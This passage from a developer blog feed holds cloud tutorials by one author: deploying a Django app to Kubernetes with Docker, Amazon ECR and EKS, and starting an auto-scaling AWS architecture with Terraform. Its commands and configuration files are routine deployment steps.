&lt;/code&gt;&lt;/pre&gt;

&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;Follow the prompts to enter your AWS Access Key ID, Secret Access Key, Default region name (e.g., us-east-1), and Default output format (e.g., json).&lt;/li&gt;
&lt;/ul&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Start an SSM Session&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use the following command to start a session with your instance:
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt; aws ssm start-session &lt;span class="nt"&gt;--target&lt;/span&gt; &amp;lt;instance-id&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;Replace &lt;code&gt;&amp;lt;instance-id&amp;gt;&lt;/code&gt; with the actual instance ID of your EC2 instance in the private subnet.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Example
&lt;/h3&gt;

&lt;p&gt;Assuming your instance ID is &lt;code&gt;i-0a677d0c4370bebab&lt;/code&gt;, you would run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws ssm start-session --target i-0a677d0c4370bebab
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We are now connected and can run simple commands like &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;uptime&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqi2zkfbipaiou84mh3i6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqi2zkfbipaiou84mh3i6.png" alt="Image description" width="800" height="128"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Note: If you have trouble for any reason, you can reference this &lt;a href="https://aws.amazon.com/solutions/implementations/linux-bastion/" rel="noopener noreferrer"&gt;deployment guide&lt;/a&gt; and use the CloudFormation template provided.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Deploying a Django App to Kubernetes with Amazon ECR and EKS</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Fri, 12 Jul 2024 20:37:48 +0000</pubDate>
      <link>https://dev.to/aktran321/deploying-a-django-app-to-kubernetes-with-amazon-ecr-and-eks-3736</link>
      <guid>https://dev.to/aktran321/deploying-a-django-app-to-kubernetes-with-amazon-ecr-and-eks-3736</guid>
      <description>&lt;p&gt;Today, I'll be deploying a simple Django App to practice using Docker and Kubernetes.&lt;/p&gt;

&lt;p&gt;I have a simple setup. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4n8h5mehpkwtyy5fkwps.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4n8h5mehpkwtyy5fkwps.png" alt="Image description" width="474" height="292"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A directory with cloned git repo and a virtual environment.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftykkpg12x5kouv9syxdg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftykkpg12x5kouv9syxdg.png" alt="Image description" width="484" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;"kubesite" is the django project.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwll87rm6wz2bzxrmv7r7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwll87rm6wz2bzxrmv7r7.png" alt="Image description" width="482" height="612"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And within it, I created an app that displays "Hello, world!", routed to the /hello path.&lt;/p&gt;

&lt;p&gt;Once I verified that the application works, I created my requirements.txt file&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip freeze &amp;gt; requirements.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This lists all the dependencies within the virtual environment. &lt;/p&gt;

&lt;p&gt;I then downloaded &lt;a href="https://docs.docker.com/get-docker/" rel="noopener noreferrer"&gt;Docker&lt;/a&gt; and created my Dockerfile.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;touch Dockerfile
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Use the official Python image from the Docker Hub
FROM python:3.12-slim

# Set environment variables
ENV PYTHONUNBUFFERED=1

# Set the working directory
WORKDIR /app

# Copy the requirements file into the container
COPY requirements.txt /app/

# Install any needed packages specified in requirements.txt
RUN pip install --no-cache-dir -r requirements.txt

# Copy the current directory contents into the container at /app
COPY . /app/

# Expose port 8000
EXPOSE 8000

# Run the Django server
CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I run the command &lt;code&gt;docker build -t my-django-app .&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
which creates the Docker image shown in the Docker Desktop application.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuynqntx6w04fz8w4a6xc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuynqntx6w04fz8w4a6xc.png" alt="Image description" width="800" height="349"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Running &lt;code&gt;docker run -p 8000:8000 my-django-app&lt;br&gt;
&lt;/code&gt;&lt;br&gt;
I can open the URL and see that my application is successfully running on Docker.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa9r1qaaiylj3xvuszdec.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa9r1qaaiylj3xvuszdec.png" alt="Image description" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, to deploy the application over Kubernetes, we can utilize Amazon ECR and EKS.&lt;/p&gt;

&lt;p&gt;Amazon Elastic Container Registry (ECR) will store the Docker container image. Amazon Elastic Kubernetes Service (EKS) will deploy the Kubernetes cluster and let AWS handle control plane operations.&lt;/p&gt;

&lt;p&gt;In my CLI, I run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws ecr get-login-password --region &amp;lt;my-region&amp;gt; | docker login --username AWS --password-stdin &amp;lt;my-account-id&amp;gt;.dkr.ecr.&amp;lt;my-region&amp;gt;.amazonaws.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;to authenticate Docker with my ECR registry.&lt;/p&gt;
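
&lt;p&gt;If the repository doesn't exist in ECR yet, it has to be created before the push, for example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws ecr create-repository --repository-name my-django-app --region &amp;lt;my-region&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;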

&lt;p&gt;I run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker tag my-django-app:latest &amp;lt;my-account-id&amp;gt;.dkr.ecr.&amp;lt;my-region&amp;gt;.amazonaws.com/my-django-app:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;to tag the Docker image.&lt;/p&gt;

&lt;p&gt;Finally, I push the image to ECR&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker push &amp;lt;your-account-id&amp;gt;.dkr.ecr.&amp;lt;your-region&amp;gt;.amazonaws.com/my-django-app:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  EKS
&lt;/h2&gt;

&lt;p&gt;Now, I navigate to Amazon EKS in the AWS console and create a cluster with the name "my-django-app". I kept default settings, but also created a security group with this permission&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3zwyznqsowo0hec45ce0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3zwyznqsowo0hec45ce0.png" alt="Image description" width="800" height="76"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This will allow the Kubernetes control plane access to AWS resources.&lt;/p&gt;

&lt;p&gt;The clusters take awhile to create, but once that is finished, I connect to the EKS cluster with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws eks update-kubeconfig --region &amp;lt;my-region&amp;gt; --name &amp;lt;my-cluster-name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I created this yaml file in my project, which will set the configurations for my deployment&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-django-app
spec:
  replicas: 3
  selector:
    matchLabels:
      app: my-django-app
  template:
    metadata:
      labels:
        app: my-django-app
    spec:
      containers:
      - name: my-django-app
        image: &amp;lt;my-account-id&amp;gt;.dkr.ecr.&amp;lt;my-region&amp;gt;.amazonaws.com/my-django-app:latest
        ports:
        - containerPort: 8000
---
apiVersion: v1
kind: Service
metadata:
  name: my-django-app
spec:
  type: LoadBalancer
  selector:
    app: my-django-app
  ports:
  - protocol: TCP
    port: 80
    targetPort: 8000

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I then apply the deployment to the EKS cluster&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl apply -f deployment.yaml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Check the pods are running&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get pods
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu7sv3uv5axbl6vhrh7p2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu7sv3uv5axbl6vhrh7p2.png" alt="Image description" width="800" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;My pods are not currently running as I need to configure a worker node group in the EKS console.&lt;/p&gt;

&lt;p&gt;I specified min=1, max=3, desired=2 using a t2.medium and a security group that allowed inbound SSH from my IP. &lt;/p&gt;
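&lt;p&gt;Once the node group is active, a quick sanity check that the worker nodes actually joined the cluster is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get nodes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;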

&lt;p&gt;I have to re-run the deployment and then run &lt;code&gt;kubectl get pods&lt;/code&gt; again.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F80kprscgzxyci11cnbto.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F80kprscgzxyci11cnbto.png" alt="Image description" width="800" height="258"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And verify the service's external IP&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get svc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I can now access my app through the IP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh5w8cbebric9ak550fxi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh5w8cbebric9ak550fxi.png" alt="Image description" width="800" height="299"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And here it is!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faxjstft2wha5qegr2bqa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faxjstft2wha5qegr2bqa.png" alt="Image description" width="800" height="251"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cleanup
&lt;/h2&gt;

&lt;p&gt;Delete the deployment&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl delete -f deployment.yaml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and verify the deletion&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl get pods
kubectl get svc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The EKS Cluster, the attached node group and ECR repository were deleted manually through the AWS console.&lt;/p&gt;
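&lt;p&gt;For reference, the same cleanup can be done from the CLI. This is a sketch assuming the names used earlier; substitute whatever node group name you chose in the console:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# the node group must finish deleting before the cluster can be deleted
aws eks delete-nodegroup --cluster-name my-django-app --nodegroup-name &amp;lt;my-nodegroup-name&amp;gt; --region &amp;lt;my-region&amp;gt;
aws eks delete-cluster --name my-django-app --region &amp;lt;my-region&amp;gt;
aws ecr delete-repository --repository-name my-django-app --region &amp;lt;my-region&amp;gt; --force
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;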

&lt;p&gt;Deploying a simple Django application using Docker and Kubernetes has been a practical and useful experience. This process, from building a Docker image to pushing it to Amazon ECR and deploying it on Amazon EKS, shows how these tools work together to manage application deployment.&lt;/p&gt;

&lt;p&gt;Starting from a local setup and moving to a cloud deployment gives you a clear understanding of current DevOps practices. Cleaning up the resources afterward ensures you avoid unnecessary costs and keeps your AWS environment tidy. This project not only enhances your understanding of Docker and Kubernetes but also prepares you for deploying more complex applications in the future.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Creating an Auto-Scaling Web Server Architecture</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Thu, 11 Jul 2024 19:56:19 +0000</pubDate>
      <link>https://dev.to/aktran321/creating-an-auto-scaling-web-server-architecture-1i3k</link>
      <guid>https://dev.to/aktran321/creating-an-auto-scaling-web-server-architecture-1i3k</guid>
<description>&lt;p&gt;Since completing the AWS Cloud Resume Challenge, I've been more curious about Terraform. Today, I'll be using Terraform to create an AWS architecture containing public subnets, private subnets, an Application Load Balancer (ALB), and an Auto Scaling Group (ASG) for EC2 instances. The ASG scales instances up or down based on specific CPU usage thresholds.&lt;/p&gt;

&lt;p&gt;This type of process is crucial when trying to cut costs for a business. &lt;/p&gt;

&lt;p&gt;To start the project, I created another repository on Github and cloned it to my local computer. &lt;/p&gt;

&lt;p&gt;I created a main.tf file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~&amp;gt; 5.0"
    }
  }
}
provider "aws" {
  region     = "us-east-1"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I made sure to define my environment variables in the .bashrc file. &lt;/p&gt;

&lt;p&gt;Run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;nano ~/.bashrc&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;and define your variables&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;export AWS_ACCESS_KEY_ID = "&amp;lt;your aws user access key&amp;gt;"
export AWS_SECRET_ACCESS_KEY = "&amp;lt;your aws user secret key&amp;gt;"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After saving the file, it needs to be reloaded for the variables to become available.&lt;/p&gt;

&lt;p&gt;To re-load run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;source ~/.bashrc&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Existing shell sessions won't see the new variables until the file is re-sourced, but any new bash session loads them automatically.&lt;/p&gt;

&lt;p&gt;Defining the variables in the .bashrc script means we can remove these lines from our file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;access_key = "AWS_ACCESS_KEY_ID"
secret_key = "AWS_SECRET_ACCESS_KEY"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;because the AWS provider reads the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environment variables directly.&lt;/p&gt;

&lt;p&gt;To create a VPC, add this to main.tf:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Create a VPC
resource "aws_vpc" "example" {
  cidr_block = "10.0.0.0/16"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After running commands:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;terraform init&lt;/li&gt;
&lt;li&gt;terraform apply&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I see that Terraform has completed creating my VPC.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fav1nc4kjn6fymjg3ljvi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fav1nc4kjn6fymjg3ljvi.png" alt="Image description" width="800" height="241"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I check my console to make sure it was created.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0967w3pun2ywrr4spgq2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0967w3pun2ywrr4spgq2.png" alt="Image description" width="800" height="88"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The IDs match up, so Terraform is configured correctly. One thing to note: the name "example" is just Terraform's identifier for the resource. If we want to name the VPC itself, we have to include a tag for the resource.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_vpc" "example" {
  cidr_block = "10.0.0.0/16"

  tags = {
    Name = "example-vpc"
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can see here that we don't have any subnets yet. We want to make 3 public and 3 private subnets.&lt;/p&gt;

&lt;p&gt;Here is how to implement them&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Subnets
resource "aws_subnet" "public_1" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.1.0/24"
  availability_zone = "us-east-1a"
  map_public_ip_on_launch = true
}

resource "aws_subnet" "public_2" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.2.0/24"
  availability_zone = "us-east-1b"
  map_public_ip_on_launch = true
}

resource "aws_subnet" "public_3" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.3.0/24"
  availability_zone = "us-east-1c"
  map_public_ip_on_launch = true
}

resource "aws_subnet" "private_1" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.4.0/24"
  availability_zone = "us-east-1a"
}

resource "aws_subnet" "private_2" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.5.0/24"
  availability_zone = "us-east-1b"
}

resource "aws_subnet" "private_3" {
  vpc_id            = aws_vpc.example.id
  cidr_block        = "10.0.6.0/24"
  availability_zone = "us-east-1c"
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Having multiple subnets in different availability zones provides high availability in case EC2 instances are shut down for any reason.&lt;/p&gt;

&lt;p&gt;Note that the subnets are created in the correct VPC with this line&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;vpc_id            = aws_vpc.example.id
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The "example" is just the variable name we provided for our VPC earlier. &lt;/p&gt;

&lt;p&gt;Next, I created an internet gateway&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Internet Gateway
resource "aws_internet_gateway" "main" {
  vpc_id = aws_vpc.example.id
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next I create a route table and configure outbound traffic to be directed to the internet gateway that was just created.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Route Table for Public Subnets
resource "aws_route_table" "public" {
  vpc_id = aws_vpc.example.id

  route {
    cidr_block = "0.0.0.0/0"
    gateway_id = aws_internet_gateway.main.id
  }
}

# Route Table Associations for Public Subnets
resource "aws_route_table_association" "public_1" {
  subnet_id      = aws_subnet.public_1.id
  route_table_id = aws_route_table.public.id
}

resource "aws_route_table_association" "public_2" {
  subnet_id      = aws_subnet.public_2.id
  route_table_id = aws_route_table.public.id
}

resource "aws_route_table_association" "public_3" {
  subnet_id      = aws_subnet.public_3.id
  route_table_id = aws_route_table.public.id
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The route table association resources associate the route table with the 3 public subnets.&lt;/p&gt;

&lt;p&gt;So, to summarize:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;An internet gateway was created to connect the VPC to the internet.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The route table was created to direct all outbound traffic toward the internet gateway.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The aws_route_table_association resources link the public subnets to the route table. This ensures that traffic from instances within the subnets is directed to the internet gateway.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now, we have to create a security group&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Security Group
resource "aws_security_group" "web" {
  vpc_id = aws_vpc.example.id

  ingress {
    from_port   = 80
    to_port     = 80
    protocol    = "tcp"
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The security group is named "web" and attached to the "example" VPC.&lt;/p&gt;

&lt;p&gt;The ingress rule allows incoming TCP traffic on port 80. The CIDR is set to "0.0.0.0/0", so it allows incoming HTTP traffic from anywhere.&lt;/p&gt;

&lt;p&gt;The egress rule allows all outbound traffic from the instances associated with this security group. This is a common default setting that permits instances to initiate connections to any destination.&lt;/p&gt;

&lt;p&gt;Next we specify a User Data script&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# EC2 User Data Script
data "template_file" "userdata" {
  template = &amp;lt;&amp;lt;-EOF
              #!/bin/bash
              yum update -y
              yum install -y httpd
              systemctl start httpd
              systemctl enable httpd
              echo "Hello World from $(hostname -f)" &amp;gt; /var/www/html/index.html
            EOF
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The user data script is used to bootstrap the EC2 instance with necessary configurations and software installations when it first starts. In this case, it installs and configures an Apache web server and sets up a simple "Hello World" web page.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Launch Configuration
resource "aws_launch_configuration" "web" {
  name          = "web-launch-configuration"
  image_id      = "ami-0b72821e2f351e396" # Amazon Linux 2 AMI
  instance_type = "t2.micro"
  security_groups = [aws_security_group.web.id]

  user_data = data.template_file.userdata.rendered

  lifecycle {
    create_before_destroy = true
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



